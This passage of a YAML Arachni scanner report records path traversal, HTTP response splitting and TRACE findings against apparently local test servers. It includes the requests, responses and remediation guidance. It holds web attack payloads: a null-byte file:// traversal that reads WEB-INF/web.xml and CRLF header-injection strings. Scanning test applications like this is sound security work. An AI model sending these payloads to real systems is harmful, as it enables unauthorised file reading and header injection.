      WASC: http://projects.webappsec.org/Path-Traversal
    regexp: (?i-mx:<web-app)
    regexp_match: <web-app
    remedy_code: ""
    remedy_guidance: |-
      User inputs must be validated and filtered
          before being used as a part of a filesystem path.
    response: |
      <?xml version="1.0" encoding="UTF-8"?>
      <web-app xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns="http://java.sun.com/xml/ns/javaee" xmlns:web="http://java.sun.com/xml/ns/javaee/web-app_2_5.xsd" xsi:schemaLocation="http://java.sun.com/xml/ns/javaee http://java.sun.com/xml/ns/javaee/web-app_2_5.xsd" id="WebApp_ID" version="2.5">
        <display-name>VulnerabilityDetectionChallenge</display-name>
        <welcome-file-list>
          <welcome-file>index.html</welcome-file>
          <welcome-file>index.htm</welcome-file>
          <welcome-file>index.jsp</welcome-file>
          <welcome-file>default.html</welcome-file>
          <welcome-file>default.htm</welcome-file>
          <welcome-file>default.jsp</welcome-file>
        </welcome-file-list>
      
        <!-- Define a Security Constraint on this Application -->
        <security-constraint>
          <web-resource-collection>
           <web-resource-name>Weak authentication - basic</web-resource-name>
           <url-pattern>/passive/session/weak-authentication-basic.jsp</url-pattern>
          </web-resource-collection>
          <auth-constraint>
           <role-name>tomcat</role-name>
           <role-name>role1</role-name>
          </auth-constraint>
        </security-constraint>
      
        <!-- Define the Login Configuration for this Application -->
        <login-config>
          <auth-method>BASIC</auth-method>
          <realm-name>Application</realm-name>
          <!--realm-name>Weak authentication - basic</realm-name-->
        </login-config>
      
        <!-- Security roles referenced by this web application -->
        <security-role>
          <description>
            The role that is required to access protected pages
          </description>
           <role-name>tomcat</role-name>
        </security-role>
      
        <security-role>
          <description>
            The role that is required to access protected pages
          </description>
           <role-name>role1</role-name>
        </security-role>

    severity: Medium
    tags: 
    - path
    - traversal
    - injection
    - regexp
    url: http://localhost:11084/tomcat/link/with_null?input=default.html
    var: input
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  cvssv2: "4.3"
  cwe: "22"
  cwe_url: http://cwe.mitre.org/data/definitions/22.html
  description: |-
    The web application enforces improper limitation
        of a pathname to a restricted directory.
  elem: cookie
  internal_modname: PathTraversal
  metasploitable: unix/webapp/arachni_path_traversal
  method: GET
  mod_name: PathTraversal
  name: Path Traversal
  references: 
    OWASP: http://www.owasp.org/index.php/Path_Traversal
    WASC: http://projects.webappsec.org/Path-Traversal
  remedy_code: ""
  remedy_guidance: |-
    User inputs must be validated and filtered
        before being used as a part of a filesystem path.
  severity: Medium
  tags: 
  - path
  - traversal
  - injection
  - regexp
  url: http://localhost:11084/tomcat/cookie/straight
  var: cookie
  variations: 
  - !ruby/object:Arachni::Issue 
    cvssv2: "4.3"
    cwe: "22"
    cwe_url: http://cwe.mitre.org/data/definitions/22.html
    description: |-
      The web application enforces improper limitation
          of a pathname to a restricted directory.
    elem: cookie
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
        Cookie: cookie=file://WEB-INF/web.xml%00.xml
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "1786"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: <web-app
    injected: !binary |
      ZmlsZTovL1dFQi1JTkYvd2ViLnhtbAAueG1s

    internal_modname: PathTraversal
    metasploitable: unix/webapp/arachni_path_traversal
    method: GET
    mod_name: PathTraversal
    name: Path Traversal
    opts: 
      :redundant: false
      :async: true
      :regexp: (?i-mx:<web-app)
      :match: <web-app
      :substring: 
      :ignore: 
      :elements: 
      - link
      - form
      - cookie
      - header
      - body
      :train: 
      :format: 
      - 1
      :injected_orig: file://WEB-INF/web.xml
      :altered: cookie
      :element: cookie
      :params: {}

      :follow_location: true
      :cookies: 
        cookie: !binary |
          ZmlsZTovL1dFQi1JTkYvd2ViLnhtbAAueG1s

      :injected: !binary |
        ZmlsZTovL1dFQi1JTkYvd2ViLnhtbAAueG1s

      :combo: 
        cookie: !binary |
          ZmlsZTovL1dFQi1JTkYvd2ViLnhtbAAueG1s

      :action: http://localhost:11084/tomcat/cookie/straight
      :verification: false
      :id: <web-app
    references: 
      OWASP: http://www.owasp.org/index.php/Path_Traversal
      WASC: http://projects.webappsec.org/Path-Traversal
    regexp: (?i-mx:<web-app)
    regexp_match: <web-app
    remedy_code: ""
    remedy_guidance: |-
      User inputs must be validated and filtered
          before being used as a part of a filesystem path.
    response: |
      <?xml version="1.0" encoding="UTF-8"?>
      <web-app xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns="http://java.sun.com/xml/ns/javaee" xmlns:web="http://java.sun.com/xml/ns/javaee/web-app_2_5.xsd" xsi:schemaLocation="http://java.sun.com/xml/ns/javaee http://java.sun.com/xml/ns/javaee/web-app_2_5.xsd" id="WebApp_ID" version="2.5">
        <display-name>VulnerabilityDetectionChallenge</display-name>
        <welcome-file-list>
          <welcome-file>index.html</welcome-file>
          <welcome-file>index.htm</welcome-file>
          <welcome-file>index.jsp</welcome-file>
          <welcome-file>default.html</welcome-file>
          <welcome-file>default.htm</welcome-file>
          <welcome-file>default.jsp</welcome-file>
        </welcome-file-list>
      
        <!-- Define a Security Constraint on this Application -->
        <security-constraint>
          <web-resource-collection>
           <web-resource-name>Weak authentication - basic</web-resource-name>
           <url-pattern>/passive/session/weak-authentication-basic.jsp</url-pattern>
          </web-resource-collection>
          <auth-constraint>
           <role-name>tomcat</role-name>
           <role-name>role1</role-name>
          </auth-constraint>
        </security-constraint>
      
        <!-- Define the Login Configuration for this Application -->
        <login-config>
          <auth-method>BASIC</auth-method>
          <realm-name>Application</realm-name>
          <!--realm-name>Weak authentication - basic</realm-name-->
        </login-config>
      
        <!-- Security roles referenced by this web application -->
        <security-role>
          <description>
            The role that is required to access protected pages
          </description>
           <role-name>tomcat</role-name>
        </security-role>
      
        <security-role>
          <description>
            The role that is required to access protected pages
          </description>
           <role-name>role1</role-name>
        </security-role>

    severity: Medium
    tags: 
    - path
    - traversal
    - injection
    - regexp
    url: http://localhost:11084/tomcat/cookie/straight
    var: cookie
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  cvssv2: "4.3"
  cwe: "22"
  cwe_url: http://cwe.mitre.org/data/definitions/22.html
  description: |-
    The web application enforces improper limitation
        of a pathname to a restricted directory.
  elem: header
  internal_modname: PathTraversal
  metasploitable: unix/webapp/arachni_path_traversal
  method: GET
  mod_name: PathTraversal
  name: Path Traversal
  references: 
    OWASP: http://www.owasp.org/index.php/Path_Traversal
    WASC: http://projects.webappsec.org/Path-Traversal
  remedy_code: ""
  remedy_guidance: |-
    User inputs must be validated and filtered
        before being used as a part of a filesystem path.
  severity: Medium
  tags: 
  - path
  - traversal
  - injection
  - regexp
  url: http://localhost:11084/tomcat/header/straight
  var: User-Agent
  variations: 
  - !ruby/object:Arachni::Issue 
    cvssv2: "4.3"
    cwe: "22"
    cwe_url: http://cwe.mitre.org/data/definitions/22.html
    description: |-
      The web application enforces improper limitation
          of a pathname to a restricted directory.
    elem: header
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: !binary |
          ZmlsZTovL1dFQi1JTkYvd2ViLnhtbAAu

        Cookie: cookie=default.html
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "1786"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: <web-app
    injected: !binary |
      ZmlsZTovL1dFQi1JTkYvd2ViLnhtbAAu

    internal_modname: PathTraversal
    metasploitable: unix/webapp/arachni_path_traversal
    method: GET
    mod_name: PathTraversal
    name: Path Traversal
    opts: 
      :redundant: false
      :async: true
      :regexp: (?i-mx:<web-app)
      :match: <web-app
      :substring: 
      :ignore: 
      :elements: 
      - link
      - form
      - cookie
      - header
      - body
      :train: 
      :format: 
      - 1
      :injected_orig: file://WEB-INF/web.xml
      :altered: User-Agent
      :element: header
      :params: 
      :follow_location: true
      :headers: 
        User-Agent: !binary |
          ZmlsZTovL1dFQi1JTkYvd2ViLnhtbAAu

      :injected: !binary |
        ZmlsZTovL1dFQi1JTkYvd2ViLnhtbAAu

      :combo: 
        User-Agent: !binary |
          ZmlsZTovL1dFQi1JTkYvd2ViLnhtbAAu

      :action: http://localhost:11084/tomcat/header/straight
      :verification: false
      :id: <web-app
    references: 
      OWASP: http://www.owasp.org/index.php/Path_Traversal
      WASC: http://projects.webappsec.org/Path-Traversal
    regexp: (?i-mx:<web-app)
    regexp_match: <web-app
    remedy_code: ""
    remedy_guidance: |-
      User inputs must be validated and filtered
          before being used as a part of a filesystem path.
    response: |
      <?xml version="1.0" encoding="UTF-8"?>
      <web-app xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns="http://java.sun.com/xml/ns/javaee" xmlns:web="http://java.sun.com/xml/ns/javaee/web-app_2_5.xsd" xsi:schemaLocation="http://java.sun.com/xml/ns/javaee http://java.sun.com/xml/ns/javaee/web-app_2_5.xsd" id="WebApp_ID" version="2.5">
        <display-name>VulnerabilityDetectionChallenge</display-name>
        <welcome-file-list>
          <welcome-file>index.html</welcome-file>
          <welcome-file>index.htm</welcome-file>
          <welcome-file>index.jsp</welcome-file>
          <welcome-file>default.html</welcome-file>
          <welcome-file>default.htm</welcome-file>
          <welcome-file>default.jsp</welcome-file>
        </welcome-file-list>
      
        <!-- Define a Security Constraint on this Application -->
        <security-constraint>
          <web-resource-collection>
           <web-resource-name>Weak authentication - basic</web-resource-name>
           <url-pattern>/passive/session/weak-authentication-basic.jsp</url-pattern>
          </web-resource-collection>
          <auth-constraint>
           <role-name>tomcat</role-name>
           <role-name>role1</role-name>
          </auth-constraint>
        </security-constraint>
      
        <!-- Define the Login Configuration for this Application -->
        <login-config>
          <auth-method>BASIC</auth-method>
          <realm-name>Application</realm-name>
          <!--realm-name>Weak authentication - basic</realm-name-->
        </login-config>
      
        <!-- Security roles referenced by this web application -->
        <security-role>
          <description>
            The role that is required to access protected pages
          </description>
           <role-name>tomcat</role-name>
        </security-role>
      
        <security-role>
          <description>
            The role that is required to access protected pages
          </description>
           <role-name>role1</role-name>
        </security-role>

    severity: Medium
    tags: 
    - path
    - traversal
    - injection
    - regexp
    url: http://localhost:11084/tomcat/header/straight
    var: User-Agent
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  cvssv2: "5.0"
  cwe: "20"
  cwe_url: http://cwe.mitre.org/data/definitions/20.html
  description: |-
    The web application includes user input
         in the response HTTP header.
  elem: form
  internal_modname: ResponseSplitting
  method: GET
  mod_name: ResponseSplitting
  name: Response splitting
  references: 
    SecuriTeam: http://www.securiteam.com/securityreviews/5WP0E2KFGK.html
    OWASP: http://www.owasp.org/index.php/HTTP_Response_Splitting
  remedy_code: ""
  remedy_guidance: |-
    User inputs must be validated and filtered
        before being included as part of the HTTP response headers.
  severity: Medium
  tags: 
  - response
  - splitting
  - injection
  - header
  url: http://localhost:13478/form/straight
  var: input
  variations: 
  - !ruby/object:Arachni::Issue 
    cvssv2: "5.0"
    cwe: "20"
    cwe_url: http://cwe.mitre.org/data/definitions/20.html
    description: |-
      The web application includes user input
           in the response HTTP header.
    elem: form
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
        Cookie: cookie=cookie+value;cookie2=cookie+value
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        X-Crlf-Safe: "no"
        Content-Length: "0"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: 
    injected: "%0D%0AX-CRLF-Safe:%20no"
    internal_modname: ResponseSplitting
    method: GET
    mod_name: ResponseSplitting
    name: Response splitting
    opts: 
      :redundant: false
      :async: true
      :elements: 
      - link
      - form
      - cookie
      - header
      - body
      :train: 
      :param_flip: true
      :follow_location: false
      :injected_orig: "\r\n\
        X-CRLF-Safe: no"
      :altered: input
      :element: form
      :params: 
        input: &id007 "\r\n\
          X-CRLF-Safe: no"
      :injected: "%0D%0AX-CRLF-Safe:%20no"
      :combo: 
        input: *id007
      :action: http://localhost:13478/form/straight
      :regexp: ""
    references: 
      SecuriTeam: http://www.securiteam.com/securityreviews/5WP0E2KFGK.html
      OWASP: http://www.owasp.org/index.php/HTTP_Response_Splitting
    regexp: ""
    regexp_match: 
    remedy_code: ""
    remedy_guidance: |-
      User inputs must be validated and filtered
          before being included as part of the HTTP response headers.
    response: ""
    severity: Medium
    tags: 
    - response
    - splitting
    - injection
    - header
    url: http://localhost:13478/form/straight
    var: input
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  cvssv2: "5.0"
  cwe: "20"
  cwe_url: http://cwe.mitre.org/data/definitions/20.html
  description: |-
    The web application includes user input
         in the response HTTP header.
  elem: form
  internal_modname: ResponseSplitting
  method: GET
  mod_name: ResponseSplitting
  name: Response splitting
  references: 
    SecuriTeam: http://www.securiteam.com/securityreviews/5WP0E2KFGK.html
    OWASP: http://www.owasp.org/index.php/HTTP_Response_Splitting
  remedy_code: ""
  remedy_guidance: |-
    User inputs must be validated and filtered
        before being included as part of the HTTP response headers.
  severity: Medium
  tags: 
  - response
  - splitting
  - injection
  - header
  url: http://localhost:13478/form/append
  var: input
  variations: 
  - !ruby/object:Arachni::Issue 
    cvssv2: "5.0"
    cwe: "20"
    cwe_url: http://cwe.mitre.org/data/definitions/20.html
    description: |-
      The web application includes user input
           in the response HTTP header.
    elem: form
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
        Cookie: cookie=cookie+value;cookie2=cookie+value
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        X-Crlf-Safe: "no"
        Content-Length: "0"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: 
    injected: default%0D%0AX-CRLF-Safe:%20no
    internal_modname: ResponseSplitting
    method: GET
    mod_name: ResponseSplitting
    name: Response splitting
    opts: 
      :redundant: false
      :async: true
      :elements: 
      - link
      - form
      - cookie
      - header
      - body
      :train: 
      :param_flip: true
      :follow_location: false
      :injected_orig: "\r\n\
        X-CRLF-Safe: no"
      :altered: input
      :element: form
      :params: 
        input: &id008 |-
          default
          X-CRLF-Safe: no
      :injected: default%0D%0AX-CRLF-Safe:%20no
      :combo: 
        input: *id008
      :action: http://localhost:13478/form/append
      :regexp: ""
    references: 
      SecuriTeam: http://www.securiteam.com/securityreviews/5WP0E2KFGK.html
      OWASP: http://www.owasp.org/index.php/HTTP_Response_Splitting
    regexp: ""
    regexp_match: 
    remedy_code: ""
    remedy_guidance: |-
      User inputs must be validated and filtered
          before being included as part of the HTTP response headers.
    response: ""
    severity: Medium
    tags: 
    - response
    - splitting
    - injection
    - header
    url: http://localhost:13478/form/append
    var: input
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  cvssv2: "5.0"
  cwe: "20"
  cwe_url: http://cwe.mitre.org/data/definitions/20.html
  description: |-
    The web application includes user input
         in the response HTTP header.
  elem: link
  internal_modname: ResponseSplitting
  method: GET
  mod_name: ResponseSplitting
  name: Response splitting
  references: 
    SecuriTeam: http://www.securiteam.com/securityreviews/5WP0E2KFGK.html
    OWASP: http://www.owasp.org/index.php/HTTP_Response_Splitting
  remedy_code: ""
  remedy_guidance: |-
    User inputs must be validated and filtered
        before being included as part of the HTTP response headers.
  severity: Medium
  tags: 
  - response
  - splitting
  - injection
  - header
  url: http://localhost:13478/link/straight?input=default
  var: input
  variations: 
  - !ruby/object:Arachni::Issue 
    cvssv2: "5.0"
    cwe: "20"
    cwe_url: http://cwe.mitre.org/data/definitions/20.html
    description: |-
      The web application includes user input
           in the response HTTP header.
    elem: link
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
        Cookie: cookie=cookie+value;cookie2=cookie+value
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        X-Crlf-Safe: "no"
        Content-Length: "0"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: 
    injected: "%0D%0AX-CRLF-Safe:%20no"
    internal_modname: ResponseSplitting
    method: GET
    mod_name: ResponseSplitting
    name: Response splitting
    opts: 
      :redundant: false
      :async: true
      :elements: 
      - link
      - form
      - cookie
      - header
      - body
      :train: 
      :param_flip: true
      :follow_location: false
      :injected_orig: "\r\n\
        X-CRLF-Safe: no"
      :altered: input
      :element: link
      :params: 
        input: &id009 "\r\n\
          X-CRLF-Safe: no"
      :injected: "%0D%0AX-CRLF-Safe:%20no"
      :combo: 
        input: *id009
      :action: http://localhost:13478/link/straight?input=default
      :regexp: ""
    references: 
      SecuriTeam: http://www.securiteam.com/securityreviews/5WP0E2KFGK.html
      OWASP: http://www.owasp.org/index.php/HTTP_Response_Splitting
    regexp: ""
    regexp_match: 
    remedy_code: ""
    remedy_guidance: |-
      User inputs must be validated and filtered
          before being included as part of the HTTP response headers.
    response: ""
    severity: Medium
    tags: 
    - response
    - splitting
    - injection
    - header
    url: http://localhost:13478/link/straight?input=default
    var: input
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  cvssv2: "5.0"
  cwe: "20"
  cwe_url: http://cwe.mitre.org/data/definitions/20.html
  description: |-
    The web application includes user input
         in the response HTTP header.
  elem: link
  internal_modname: ResponseSplitting
  method: GET
  mod_name: ResponseSplitting
  name: Response splitting
  references: 
    SecuriTeam: http://www.securiteam.com/securityreviews/5WP0E2KFGK.html
    OWASP: http://www.owasp.org/index.php/HTTP_Response_Splitting
  remedy_code: ""
  remedy_guidance: |-
    User inputs must be validated and filtered
        before being included as part of the HTTP response headers.
  severity: Medium
  tags: 
  - response
  - splitting
  - injection
  - header
  url: http://localhost:13478/link/append?input=default
  var: input
  variations: 
  - !ruby/object:Arachni::Issue 
    cvssv2: "5.0"
    cwe: "20"
    cwe_url: http://cwe.mitre.org/data/definitions/20.html
    description: |-
      The web application includes user input
           in the response HTTP header.
    elem: link
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
        Cookie: cookie=cookie+value;cookie2=cookie+value
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        X-Crlf-Safe: "no"
        Content-Length: "0"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: 
    injected: default%0D%0AX-CRLF-Safe:%20no
    internal_modname: ResponseSplitting
    method: GET
    mod_name: ResponseSplitting
    name: Response splitting
    opts: 
      :redundant: false
      :async: true
      :elements: 
      - link
      - form
      - cookie
      - header
      - body
      :train: 
      :param_flip: true
      :follow_location: false
      :injected_orig: "\r\n\
        X-CRLF-Safe: no"
      :altered: input
      :element: link
      :params: 
        input: &id010 |-
          default
          X-CRLF-Safe: no
      :injected: default%0D%0AX-CRLF-Safe:%20no
      :combo: 
        input: *id010
      :action: http://localhost:13478/link/append?input=default
      :regexp: ""
    references: 
      SecuriTeam: http://www.securiteam.com/securityreviews/5WP0E2KFGK.html
      OWASP: http://www.owasp.org/index.php/HTTP_Response_Splitting
    regexp: ""
    regexp_match: 
    remedy_code: ""
    remedy_guidance: |-
      User inputs must be validated and filtered
          before being included as part of the HTTP response headers.
    response: ""
    severity: Medium
    tags: 
    - response
    - splitting
    - injection
    - header
    url: http://localhost:13478/link/append?input=default
    var: input
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  cvssv2: "5.0"
  cwe: "20"
  cwe_url: http://cwe.mitre.org/data/definitions/20.html
  description: |-
    The web application includes user input
         in the response HTTP header.
  elem: cookie
  internal_modname: ResponseSplitting
  method: GET
  mod_name: ResponseSplitting
  name: Response splitting
  references: 
    SecuriTeam: http://www.securiteam.com/securityreviews/5WP0E2KFGK.html
    OWASP: http://www.owasp.org/index.php/HTTP_Response_Splitting
  remedy_code: ""
  remedy_guidance: |-
    User inputs must be validated and filtered
        before being included as part of the HTTP response headers.
  severity: Medium
  tags: 
  - response
  - splitting
  - injection
  - header
  url: http://localhost:13478/cookie/straight
  var: cookie
  variations: 
  - !ruby/object:Arachni::Issue 
    cvssv2: "5.0"
    cwe: "20"
    cwe_url: http://cwe.mitre.org/data/definitions/20.html
    description: |-
      The web application includes user input
           in the response HTTP header.
    elem: cookie
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
        Cookie: cookie=%0D%0AX-CRLF-Safe:+no;cookie2=cookie+value
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        X-Crlf-Safe: "no"
        Content-Length: "0"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: 
    injected: "%0D%0AX-CRLF-Safe:%20no"
    internal_modname: ResponseSplitting
    method: GET
    mod_name: ResponseSplitting
    name: Response splitting
    opts: 
      :redundant: false
      :async: true
      :elements: 
      - link
      - form
      - cookie
      - header
      - body
      :train: 
      :follow_location: false
      :injected_orig: "\r\n\
        X-CRLF-Safe: no"
      :altered: cookie
      :element: cookie
      :params: {}

      :cookies: 
        cookie: &id011 "\r\n\
          X-CRLF-Safe: no"
      :injected: "%0D%0AX-CRLF-Safe:%20no"
      :combo: 
        cookie: *id011
      :action: http://localhost:13478/cookie/straight
      :regexp: ""
    references: 
      SecuriTeam: http://www.securiteam.com/securityreviews/5WP0E2KFGK.html
      OWASP: http://www.owasp.org/index.php/HTTP_Response_Splitting
    regexp: ""
    regexp_match: 
    remedy_code: ""
    remedy_guidance: |-
      User inputs must be validated and filtered
          before being included as part of the HTTP response headers.
    response: ""
    severity: Medium
    tags: 
    - response
    - splitting
    - injection
    - header
    url: http://localhost:13478/cookie/straight
    var: cookie
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  cvssv2: "5.0"
  cwe: "20"
  cwe_url: http://cwe.mitre.org/data/definitions/20.html
  description: |-
    The web application includes user input
         in the response HTTP header.
  elem: cookie
  internal_modname: ResponseSplitting
  method: GET
  mod_name: ResponseSplitting
  name: Response splitting
  references: 
    SecuriTeam: http://www.securiteam.com/securityreviews/5WP0E2KFGK.html
    OWASP: http://www.owasp.org/index.php/HTTP_Response_Splitting
  remedy_code: ""
  remedy_guidance: |-
    User inputs must be validated and filtered
        before being included as part of the HTTP response headers.
  severity: Medium
  tags: 
  - response
  - splitting
  - injection
  - header
  url: http://localhost:13478/cookie/append
  var: cookie2
  variations: 
  - !ruby/object:Arachni::Issue 
    cvssv2: "5.0"
    cwe: "20"
    cwe_url: http://cwe.mitre.org/data/definitions/20.html
    description: |-
      The web application includes user input
           in the response HTTP header.
    elem: cookie
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
        Cookie: cookie=cookie+value;cookie2=cookie+value%0D%0AX-CRLF-Safe:+no
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        X-Crlf-Safe: "no"
        Content-Length: "0"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: 
    injected: cookie%20value%0D%0AX-CRLF-Safe:%20no
    internal_modname: ResponseSplitting
    method: GET
    mod_name: ResponseSplitting
    name: Response splitting
    opts: 
      :redundant: false
      :async: true
      :elements: 
      - link
      - form
      - cookie
      - header
      - body
      :train: 
      :follow_location: false
      :injected_orig: "\r\n\
        X-CRLF-Safe: no"
      :altered: cookie2
      :element: cookie
      :params: {}

      :cookies: 
        cookie2: &id012 |-
          cookie value
          X-CRLF-Safe: no
      :injected: cookie%20value%0D%0AX-CRLF-Safe:%20no
      :combo: 
        cookie2: *id012
      :action: http://localhost:13478/cookie/append
      :regexp: ""
    references: 
      SecuriTeam: http://www.securiteam.com/securityreviews/5WP0E2KFGK.html
      OWASP: http://www.owasp.org/index.php/HTTP_Response_Splitting
    regexp: ""
    regexp_match: 
    remedy_code: ""
    remedy_guidance: |-
      User inputs must be validated and filtered
          before being included as part of the HTTP response headers.
    response: ""
    severity: Medium
    tags: 
    - response
    - splitting
    - injection
    - header
    url: http://localhost:13478/cookie/append
    var: cookie2
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  cvssv2: "5.0"
  cwe: "20"
  cwe_url: http://cwe.mitre.org/data/definitions/20.html
  description: |-
    The web application includes user input
         in the response HTTP header.
  elem: header
  internal_modname: ResponseSplitting
  method: GET
  mod_name: ResponseSplitting
  name: Response splitting
  references: 
    SecuriTeam: http://www.securiteam.com/securityreviews/5WP0E2KFGK.html
    OWASP: http://www.owasp.org/index.php/HTTP_Response_Splitting
  remedy_code: ""
  remedy_guidance: |-
    User inputs must be validated and filtered
        before being included as part of the HTTP response headers.
  severity: Medium
  tags: 
  - response
  - splitting
  - injection
  - header
  url: http://localhost:13478/header/straight
  var: User-Agent
  variations: 
  - !ruby/object:Arachni::Issue 
    cvssv2: "5.0"
    cwe: "20"
    cwe_url: http://cwe.mitre.org/data/definitions/20.html
    description: |-
      The web application includes user input
           in the response HTTP header.
    elem: header
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: "%0D%0AX-CRLF-Safe: no"
        Cookie: cookie=cookie+value;cookie2=cookie+value
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        X-Crlf-Safe: "no"
        Content-Length: "0"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: 
    injected: "%0D%0AX-CRLF-Safe:%20no"
    internal_modname: ResponseSplitting
    method: GET
    mod_name: ResponseSplitting
    name: Response splitting
    opts: 
      :redundant: false
      :async: true
      :elements: 
      - link
      - form
      - cookie
      - header
      - body
      :train: 
      :follow_location: false
      :injected_orig: "\r\n\
        X-CRLF-Safe: no"
      :altered: User-Agent
      :element: header
      :params: 
      :headers: 
        User-Agent: &id013 "\r\n\
          X-CRLF-Safe: no"
      :injected: "%0D%0AX-CRLF-Safe:%20no"
      :combo: 
        User-Agent: *id013
      :action: http://localhost:13478/header/straight
      :regexp: ""
    references: 
      SecuriTeam: http://www.securiteam.com/securityreviews/5WP0E2KFGK.html
      OWASP: http://www.owasp.org/index.php/HTTP_Response_Splitting
    regexp: ""
    regexp_match: 
    remedy_code: ""
    remedy_guidance: |-
      User inputs must be validated and filtered
          before being included as part of the HTTP response headers.
    response: ""
    severity: Medium
    tags: 
    - response
    - splitting
    - injection
    - header
    url: http://localhost:13478/header/straight
    var: User-Agent
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  cvssv2: "5.0"
  cwe: "20"
  cwe_url: http://cwe.mitre.org/data/definitions/20.html
  description: |-
    The web application includes user input
         in the response HTTP header.
  elem: header
  internal_modname: ResponseSplitting
  method: GET
  mod_name: ResponseSplitting
  name: Response splitting
  references: 
    SecuriTeam: http://www.securiteam.com/securityreviews/5WP0E2KFGK.html
    OWASP: http://www.owasp.org/index.php/HTTP_Response_Splitting
  remedy_code: ""
  remedy_guidance: |-
    User inputs must be validated and filtered
        before being included as part of the HTTP response headers.
  severity: Medium
  tags: 
  - response
  - splitting
  - injection
  - header
  url: http://localhost:13478/header/append
  var: User-Agent
  variations: 
  - !ruby/object:Arachni::Issue 
    cvssv2: "5.0"
    cwe: "20"
    cwe_url: http://cwe.mitre.org/data/definitions/20.html
    description: |-
      The web application includes user input
           in the response HTTP header.
    elem: header
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: "arachni_user%0D%0AX-CRLF-Safe: no"
        Cookie: cookie=cookie+value;cookie2=cookie+value
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        X-Crlf-Safe: "no"
        Content-Length: "0"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: 
    injected: arachni_user%0D%0AX-CRLF-Safe:%20no
    internal_modname: ResponseSplitting
    method: GET
    mod_name: ResponseSplitting
    name: Response splitting
    opts: 
      :redundant: false
      :async: true
      :elements: 
      - link
      - form
      - cookie
      - header
      - body
      :train: 
      :follow_location: false
      :injected_orig: "\r\n\
        X-CRLF-Safe: no"
      :altered: User-Agent
      :element: header
      :params: 
      :headers: 
        User-Agent: &id014 |-
          arachni_user
          X-CRLF-Safe: no
      :injected: arachni_user%0D%0AX-CRLF-Safe:%20no
      :combo: 
        User-Agent: *id014
      :action: http://localhost:13478/header/append
      :regexp: ""
    references: 
      SecuriTeam: http://www.securiteam.com/securityreviews/5WP0E2KFGK.html
      OWASP: http://www.owasp.org/index.php/HTTP_Response_Splitting
    regexp: ""
    regexp_match: 
    remedy_code: ""
    remedy_guidance: |-
      User inputs must be validated and filtered
          before being included as part of the HTTP response headers.
    response: ""
    severity: Medium
    tags: 
    - response
    - splitting
    - injection
    - header
    url: http://localhost:13478/header/append
    var: User-Agent
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  cwe: "693"
  cwe_url: http://cwe.mitre.org/data/definitions/693.html
  description: |-
    This type of attack can occur when the there
        is an XSS vulnerability and the server supports HTTP TRACE.
  elem: server
  internal_modname: XST
  method: TRACE
  mod_name: XST
  name: The TRACE HTTP method is enabled.
  references: 
    CAPEC: http://capec.mitre.org/data/definitions/107.html
